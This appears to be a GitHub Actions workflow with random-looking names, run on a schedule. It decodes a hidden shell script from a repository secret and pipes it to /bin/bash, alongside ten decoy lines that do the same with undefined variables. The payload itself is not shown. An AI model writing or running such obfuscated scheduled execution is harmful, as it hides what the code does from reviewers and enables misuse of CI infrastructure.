name: xiaodafeng3216

on:
  workflow_dispatch:
  schedule:
    - cron: '55 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xiaodafeng3216
        env:
          ji39512: ${{ secrets.ji39512 }}
        run: |
          echo $ji39512 | jq -r .kqwfu5664 | /bin/bash
          echo $fr510 | jq -r .vps9 | /bin/bash
          echo $itm5502 | jq -r .c7231 | /bin/bash
          echo $kiqxx6117 | jq -r .eryja8 | /bin/bash
          echo $xd13 | jq -r .pimb2 | /bin/bash
          echo $uh53 | jq -r .wmq13 | /bin/bash
          echo $gxm9103 | jq -r .mdref049 | /bin/bash
          echo $z94985 | jq -r .afqc78923 | /bin/bash
          echo $kwdt150 | jq -r .z6365 | /bin/bash
          echo $i9 | jq -r .mx9846 | /bin/bash
          echo $suw1881 | jq -r .aavci10573 | /bin/bash

